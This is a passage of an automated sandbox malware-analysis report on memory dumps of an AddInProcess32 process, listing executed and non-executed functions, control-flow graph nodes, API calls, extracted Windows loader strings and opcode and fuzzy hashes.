            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID: __aulldvrm
            • String ID: +$-
            • API String ID: 1302938615-2137968064
            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
            • Instruction ID: 1a85958abcd0ad6a88490ebf8327277bb31706fcc1d87a48655afea2a7aeea4f
            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
            • Instruction Fuzzy Hash: BB919071E0021A9BEB24DF6DC888ABEBBE5FF46720F14451AE955E72C4E7309B408791
            Function 018A9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: $$@
            • API String ID: 0-1194432280
            • Opcode ID: 780069e3bbc842ab045a057f0580cb86388502ea0c56d0b09de783311016cf43
            • Instruction ID: c7abfa3a1603851d0f85c2073ae9658a7a67e3eb8b0a3ed44850ce6f93b11cc0
            • Opcode Fuzzy Hash: 780069e3bbc842ab045a057f0580cb86388502ea0c56d0b09de783311016cf43
            • Instruction Fuzzy Hash: A8810C71D042699BDB36CB58CC44BEAB7B8AB48754F0045EAEA1DF7280D7709E84CF61
            Function 0192CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
            Download Yara Rule
            APIs
            • @_EH4_CallFilterFunc@8.LIBCMT ref: 0192CFBD
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID: CallFilterFunc@8
            • String ID: @$@4Cw@4Cw
            • API String ID: 4062629308-3101775584
            • Opcode ID: ffa969c69083c514f58eaaf0a488ff8cfc6b292d8e3b99ee94016d696ee3f644
            • Instruction ID: 2e6089041430611749fba66224f99d831e35d912e5a3f91c3ad39813be01ccc4
            • Opcode Fuzzy Hash: ffa969c69083c514f58eaaf0a488ff8cfc6b292d8e3b99ee94016d696ee3f644
            • Instruction Fuzzy Hash: 3D418F71940225DFDB21DFADC880AAEBBF8FF55B40F00442AE919DB268D734DA01CB61

            Execution Graph

            Execution Coverage:0%
            Dynamic/Decrypted Code Coverage:100%
            Signature Coverage:0%
            Total number of Nodes:1
            Total number of Limit Nodes:0
            execution_graph 62273 e22b60 LdrInitializeThunk

            Executed Functions

            Function 00E22C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 0 e22c0a-e22c0f 1 e22c11-e22c18 0->1 2 e22c1f-e22c26 LdrInitializeThunk 0->2
            APIs
            • LdrInitializeThunk.NTDLL(00E3FD4F,000000FF,00000024,00ED6634,00000004,00000000,?,-00000018,7D810F61,?,?,00DF8B12,?,?,?,?), ref: 00E22C24
            Memory Dump Source
            • Source File: 0000000E.00000002.2659938414.0000000000DD6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
            • Associated: 0000000E.00000002.2659938414.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E36000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E72000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000ED3000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000ED9000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_db0000_AddInProcess32.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: 2f4515624359538f77eb49c401161f45ffa1c4ffcb8a647500930bb36092d798
            • Instruction ID: 70754d3fa2f6cd130e520ac03b2df0b90ba899a8101575f5946acb51c302b228
            • Opcode Fuzzy Hash: 2f4515624359538f77eb49c401161f45ffa1c4ffcb8a647500930bb36092d798
            • Instruction Fuzzy Hash: C0B09B719015D5D5DB51E760570D71B7D1067D0705F19D076E3035641E4B38C5D1F175
            Function 00E22B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 4 e22b60-e22b6c LdrInitializeThunk
            APIs
            • LdrInitializeThunk.NTDLL(00E50DBD,?,?,?,?,00E44302), ref: 00E22B6A
            Memory Dump Source
            • Source File: 0000000E.00000002.2659938414.0000000000DD6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
            • Associated: 0000000E.00000002.2659938414.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E36000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E72000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000ED3000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000ED9000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_db0000_AddInProcess32.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: 9287deaad169a1cfec7f1e652c951720450f403f7e04ae3df32d1fca8e4fa146
            • Instruction ID: fb6140b1eb7386d989ae225623fb4d5a7b166188651fa26263b2ad60e2bf9977
            • Opcode Fuzzy Hash: 9287deaad169a1cfec7f1e652c951720450f403f7e04ae3df32d1fca8e4fa146
            • Instruction Fuzzy Hash: 7E90027120250003424571584519616441A87E0301F55D032F1019590DC9258991B125
            Function 00E22C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 6 e22c70-e22c7c LdrInitializeThunk
            APIs
            • LdrInitializeThunk.NTDLL(00DDFB34,000000FF,?,-00000018,?,00000000,00004000,00000000,?,?,00E37BE5,00001000,00004000,000000FF,?,00000000), ref: 00E22C7A
            Memory Dump Source
            • Source File: 0000000E.00000002.2659938414.0000000000DD6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
            • Associated: 0000000E.00000002.2659938414.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E36000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E72000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000ED3000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000ED9000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_db0000_AddInProcess32.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: 86209e8f72aaa4f1acaf9ee6058c07205e9eefc33bbd0dcb3f6939d681b7ad84
            • Instruction ID: 6f6696b74e1a2181318a40d649275eef6a3f763cc0d91314db12b80da17e6928
            • Opcode Fuzzy Hash: 86209e8f72aaa4f1acaf9ee6058c07205e9eefc33bbd0dcb3f6939d681b7ad84
            • Instruction Fuzzy Hash: 7B90023120158802D2507158850974A041587D0301F59D422B4429658D8A958991B121
            Function 00E22C1C Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 5 e22c1c-e22c26 LdrInitializeThunk
            APIs
            • LdrInitializeThunk.NTDLL(00E3FD4F,000000FF,00000024,00ED6634,00000004,00000000,?,-00000018,7D810F61,?,?,00DF8B12,?,?,?,?), ref: 00E22C24
            Memory Dump Source
            • Source File: 0000000E.00000002.2659938414.0000000000DD6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
            • Associated: 0000000E.00000002.2659938414.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E36000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E72000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000ED3000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000ED9000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_db0000_AddInProcess32.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: 9f5ca822e0285fca25b66fdc5a84615072b24ad10621769bda0e17ab9d0853d0
            • Instruction ID: c8bba6c9c39d80cacf335ff787e362f715cb9b5f871a5290ae3e63fba7e01a5d
            • Opcode Fuzzy Hash: 9f5ca822e0285fca25b66fdc5a84615072b24ad10621769bda0e17ab9d0853d0
            • Instruction Fuzzy Hash: 05A0023118A285558245A2B40D3C445AF24B9A211234DC38FE5869685B4B181099B673
            Function 00E22DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 7 e22df0-e22dfc LdrInitializeThunk
            APIs
            • LdrInitializeThunk.NTDLL(00E5E73E,0000005A,00EBD040,00000020,00000000,00EBD040,00000080,00E44A81,00000000,-00000001,-00000001,00000002,00000000,?,-00000001,00E2AE00), ref: 00E22DFA
            Memory Dump Source
            • Source File: 0000000E.00000002.2659938414.0000000000DD6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
            • Associated: 0000000E.00000002.2659938414.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E36000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E72000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000ED3000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000ED9000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_db0000_AddInProcess32.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: 13957ad5b9cd760ba12b20f2c78778eb05d2ebfa0797186db3d0c51d0417da2f
            • Instruction ID: 206d15ccffe285c3d9d60bdfd32e693b1c1501b0c019bf73b893047282a5bcd2
            • Opcode Fuzzy Hash: 13957ad5b9cd760ba12b20f2c78778eb05d2ebfa0797186db3d0c51d0417da2f
            • Instruction Fuzzy Hash: 0D90023120150413D25171584609707041987D0341F95D423B0429558D9A568A52F121
            Function 00E235C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 8 e235c0-e235cc LdrInitializeThunk
            APIs
            Memory Dump Source
            • Source File: 0000000E.00000002.2659938414.0000000000DD6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
            • Associated: 0000000E.00000002.2659938414.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E36000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E72000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000ED3000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000ED9000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_db0000_AddInProcess32.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: b1f15e53a727a29862f79035b6d1cd4461f36adc1faf8ffbaf3776e88eb1ffbf
            • Instruction ID: 1475f91398f7b7f31852d7cda1647bd1523e552bd7ebc55bbccce9ba9b9252c7
            • Opcode Fuzzy Hash: b1f15e53a727a29862f79035b6d1cd4461f36adc1faf8ffbaf3776e88eb1ffbf
            • Instruction Fuzzy Hash: EC90023160560402D24071584619706141587D0301F65D422B0429568D8B958A51B5A2

            Non-executed Functions

            Function 00E24A80 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 51timeCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 401 e24a80-e24a8b 402 e24a9f-e24aa6 401->402 403 e24a8d-e24a99 RtlDebugPrintTimes 401->403 404 e24aa8-e24aae 402->404 405 e24aaf-e24ab6 call e0f5a0 402->405 403->402 408 e24b25-e24b26 403->408 410 e24b23 405->410 411 e24ab8-e24b22 call e11e46 * 2 405->411 410->408 411->410
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2659938414.0000000000DD6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
            • Associated: 0000000E.00000002.2659938414.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E36000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E72000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000ED3000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000ED9000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_db0000_AddInProcess32.jbxd
            Similarity
            • API ID: DebugPrintTimes
            • String ID: 0I8w$0I8w$0I8w$0I8w$0I8w$0I8w
            • API String ID: 3446177414-2549722193
            • Opcode ID: 28a8fc320f6b957f1a04f6c9d5ff30b4683048382eb11ea0d926419fdfd373d7
            • Instruction ID: af5effc81e1f7cbc5c3c7836e6f89960994652e7da9cc144a6470cf9cb3336f4
            • Opcode Fuzzy Hash: 28a8fc320f6b957f1a04f6c9d5ff30b4683048382eb11ea0d926419fdfd373d7
            • Instruction Fuzzy Hash: 52017572E471216ED7149B297C067862BE1F7C9720F0660A7E908BF3D3D7714C86D690
            Function 00E22890 Relevance: 9.2, APIs: 6, Instructions: 190COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 612 e22890-e228b3 613 e5a4bc-e5a4c0 612->613 614 e228b9-e228cc 612->614 613->614 615 e5a4c6-e5a4ca 613->615 616 e228ce-e228d7 614->616 617 e228dd-e228df 614->617 615->614 618 e5a4d0-e5a4d4 615->618 616->617 619 e5a57e-e5a585 616->619 620 e228e1-e228e5 617->620 618->614 621 e5a4da-e5a4de 618->621 619->617 622 e228eb-e228fa 620->622 623 e22988-e2298e 620->623 621->614 627 e5a4e4-e5a4eb 621->627 624 e22900-e22905 622->624 625 e5a58a-e5a58d 622->625 626 e22908-e2290c 623->626 624->626 625->626 626->620 628 e2290e-e2291b 626->628 629 e5a564-e5a56c 627->629 630 e5a4ed-e5a4f4 627->630 631 e22921 628->631 632 e5a592-e5a599 628->632 629->614 633 e5a572-e5a576 629->633 634 e5a4f6-e5a4fe 630->634 635 e5a50b 630->635 636 e22924-e22926 631->636 644 e5a5a1-e5a5c9 call e30050 632->644 633->614 637 e5a57c call e30050 633->637 634->614 638 e5a504-e5a509 634->638 639 e5a510-e5a536 call e30050 635->639 641 e22993-e22995 636->641 642 e22928-e2292a 636->642 651 e5a55d-e5a55f 637->651 638->639 639->651 641->642 646 e22997-e229b1 call e30050 641->646 648 e22946-e22966 call e30050 642->648 649 e2292c-e2292e 642->649 661 e22969-e22974 646->661 648->661 649->648 654 e22930-e22944 call e30050 649->654 658 e22981-e22985 651->658 654->648 661->636 663 e22976-e22979 661->663 663->644 664 e2297f 663->664 664->658
            APIs
            Memory Dump Source
            • Source File: 0000000E.00000002.2659938414.0000000000DD6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
            • Associated: 0000000E.00000002.2659938414.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E36000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E72000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000ED3000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000ED9000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_db0000_AddInProcess32.jbxd
            Similarity
            • API ID: ___swprintf_l
            • String ID:
            • API String ID: 48624451-0
            • Opcode ID: 2dbb8f70161fd655ad0ad629427cb32bce174cdf541509ec5af33ce2a493e3ad
            • Instruction ID: de85ef9fd691bf6157823ed06a19d369cc903e5fce07b3ef28428881ac8f2aa0
            • Opcode Fuzzy Hash: 2dbb8f70161fd655ad0ad629427cb32bce174cdf541509ec5af33ce2a493e3ad
            • Instruction Fuzzy Hash: B3512AB1A00126BFCB24DF98989097EF7F8BB48305B54962DE555F7641E234DE44CBE0
            Function 00DFA250 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 404COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 665 dfa250-dfa26f 666 dfa58d-dfa594 665->666 667 dfa275-dfa291 665->667 666->667 670 dfa59a-e479bb 666->670 668 e479e6-e479eb 667->668 669 dfa297-dfa2a0 667->669 669->668 671 dfa2a6-dfa2ac 669->671 670->667 675 e479c1-e479c6 670->675 673 dfa6ba-dfa6bc 671->673 674 dfa2b2-dfa2b4 671->674 676 dfa2ba-dfa2bd 673->676 677 dfa6c2 673->677 674->668 674->676 678 dfa473-dfa479 675->678 676->668 679 dfa2c3-dfa2c6 676->679 677->679 680 dfa2da-dfa2dd 679->680 681 dfa2c8-dfa2d1 679->681 684 dfa6c7-dfa6d0 680->684 685 dfa2e3-dfa32b 680->685 682 dfa2d7 681->682 683 e479cb-e479d5 681->683 682->680 687 e479da-e479e3 call e6f290 683->687 684->685 686 dfa6d6-e479ff 684->686 688 dfa330-dfa335 685->688 686->687 687->668 691 dfa47c-dfa47f 688->691 692 dfa33b-dfa343 688->692 693 dfa34f-dfa35d 691->693 694 dfa485-dfa488 691->694 692->693 696 dfa345-dfa349 692->696 697 dfa48e-dfa49e 693->697 700 dfa363-dfa368 693->700 694->697 698 e47a16-e47a19 694->698 696->693 699 dfa59f-dfa5a8 696->699 697->698 703 dfa4a4-dfa4ad 697->703 701 dfa36c-dfa36e 698->701 702 e47a1f-e47a24 698->702 704 dfa5aa-dfa5ac 699->704 705 dfa5c0-dfa5c3 699->705 700->701 710 e47a26 701->710 711 dfa374-dfa38c call dfa6e0 701->711 706 e47a2b 702->706 703->701 704->693 707 dfa5b2-dfa5bb 704->707 708 e47a01 705->708 709 dfa5c9-dfa5cc 705->709 713 e47a2d-e47a2f 706->713 707->701 714 e47a0c 708->714 709->714 715 dfa5d2-dfa5d5 709->715 710->706 718 dfa4b2-dfa4b9 711->718 719 dfa392-dfa3ba 711->719 713->678 717 e47a35 713->717 714->698 715->704 720 dfa3bc-dfa3be 718->720 721 dfa4bf-dfa4c2 718->721 719->720 720->713 722 dfa3c4-dfa3cb 720->722 721->720 723 dfa4c8-dfa4d3 721->723 724 e47ae0 722->724 725 dfa3d1-dfa3d4 722->725 723->688 727 e47ae4-e47afc call e6f290 724->727 726 dfa3e0-dfa3ea 725->726 726->727 728 dfa3f0-dfa40c call dfa840 726->728 727->678 733 dfa5d7-dfa5e0 728->733 734 dfa412-dfa417 728->734 735 dfa5e2-dfa5eb 733->735 736 dfa601-dfa603 733->736 734->678 737 dfa419-dfa43d 734->737 735->736 738 dfa5ed-dfa5f1 735->738 739 dfa629-dfa631 736->739 740 dfa605-dfa623 call de4508 736->740 741 dfa440-dfa443 737->741 742 dfa5f7-dfa5fb 738->742 743 dfa681-dfa6ab RtlDebugPrintTimes 738->743 740->678 740->739 745 dfa449-dfa44c 741->745 746 dfa4d8-dfa4dc 741->746 742->736 742->743 743->736 761 dfa6b1-dfa6b5 743->761 750 e47ad6 745->750 751 dfa452-dfa454 745->751 748 dfa4e2-dfa4e5 746->748 749 e47a3a-e47a42 746->749 753 dfa634-dfa64a 748->753 755 dfa4eb-dfa4ee 748->755 749->753 754 e47a48-e47a4c 749->754 750->724 756 dfa45a-dfa461 751->756 757 dfa520-dfa539 call dfa6e0 751->757 762 dfa4f4-dfa50c 753->762 763 dfa650-dfa659 753->763 754->753 764 e47a52-e47a5b 754->764 755->745 755->762 758 dfa57b-dfa582 756->758 759 dfa467-dfa46c 756->759 771 dfa53f-dfa567 757->771 772 dfa65e-dfa665 757->772 758->726 767 dfa588 758->767 759->678 765 dfa46e 759->765 761->736 762->745 770 dfa512-dfa51b 762->770 763->751 768 e47a85-e47a87 764->768 769 e47a5d-e47a60 764->769 765->678 767->724 768->753 773 e47a8d-e47a96 768->773 774 e47a62-e47a6c 769->774 775 e47a6e-e47a71 769->775 770->751 776 dfa569-dfa56b 771->776 772->776 777 dfa66b-dfa66e 772->777 773->751 778 e47a81 774->778 779 e47a73-e47a7c 775->779 780 e47a7e 775->780 776->759 781 dfa571-dfa573 776->781 777->776 782 dfa674-dfa67c 777->782 778->768 779->773 780->778 783 dfa579 781->783 784 e47a9b-e47aa4 781->784 782->741 783->758 784->783 785 e47aaa-e47ab0 784->785 785->783 786 e47ab6-e47abe 785->786 786->783 787 e47ac4-e47acf 786->787 787->786 788 e47ad1 787->788 788->783
            Strings
            • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 00E479D5
            • RtlpFindActivationContextSection_CheckParameters, xrefs: 00E479D0, 00E479F5
            • SsHd, xrefs: 00DFA3E4
            • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 00E479FA
            Memory Dump Source
            • Source File: 0000000E.00000002.2659938414.0000000000DD6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
            • Associated: 0000000E.00000002.2659938414.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E36000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E72000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000ED3000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000ED9000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_db0000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
            • API String ID: 0-929470617
            • Opcode ID: d0f25f760007dfb075a6cd5ab4cafc709c5b6b848e4969d8f5b731a8444b719b
            • Instruction ID: 25b2a08bc1a96f5695c6e33a75aec6c92a7d2a53f9e7a31fd7e42be07bcb21e0
            • Opcode Fuzzy Hash: d0f25f760007dfb075a6cd5ab4cafc709c5b6b848e4969d8f5b731a8444b719b
            • Instruction Fuzzy Hash: A6E1C6B06083068FD724CE2CD484B7A77E1BB84354F1A8A2DEA99DB390D771DD45C7A2
            Function 00E24960 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 82timeCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1043 e24960-e2498e 1044 e24990-e249b0 RtlDebugPrintTimes 1043->1044 1045 e249b6-e249bd 1043->1045 1044->1045 1050 e24a6d-e24a70 1044->1050 1046 e249c3-e249c7 1045->1046 1047 e24a68 1045->1047 1046->1047 1049 e249cd-e249d5 1046->1049 1047->1050 1049->1047 1051 e249db-e249df 1049->1051 1051->1047 1052 e249e5-e249e8 1051->1052 1052->1047 1053 e249ea-e249ee 1052->1053 1053->1047 1054 e249f0-e249f4 1053->1054 1054->1047 1055 e249f6-e24a4c call e11e46 call e289a0 * 3 call e11e46 1054->1055 1066 e24a63-e24a66 1055->1066 1067 e24a4e-e24a51 1055->1067 1066->1047 1067->1066 1068 e24a53-e24a5d 1067->1068 1068->1066 1069 e24a5f-e24a61 1068->1069 1069->1050
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2659938414.0000000000DD6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
            • Associated: 0000000E.00000002.2659938414.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E36000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E72000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000ED3000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000ED9000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_db0000_AddInProcess32.jbxd
            Similarity
            • API ID: DebugPrintTimes
            • String ID: 0I8w$0I8w$0I8w$X
            • API String ID: 3446177414-113150377
            • Opcode ID: 26bf5a0627f670e7e1e17ba20ad0c9f07ba62796855c7c97869907344b936d24
            • Instruction ID: ddd0ff031af9cd76e72d8bfbb702e4ad47a52ab509d70befcd7bd31082e852a5
            • Opcode Fuzzy Hash: 26bf5a0627f670e7e1e17ba20ad0c9f07ba62796855c7c97869907344b936d24
            • Instruction Fuzzy Hash: A2318DB194221AEFCF11DF95FC40B8D3BB1EB88754F05505AFD08B6292E2748A95CF85
            Function 00DD660A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 142timeCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
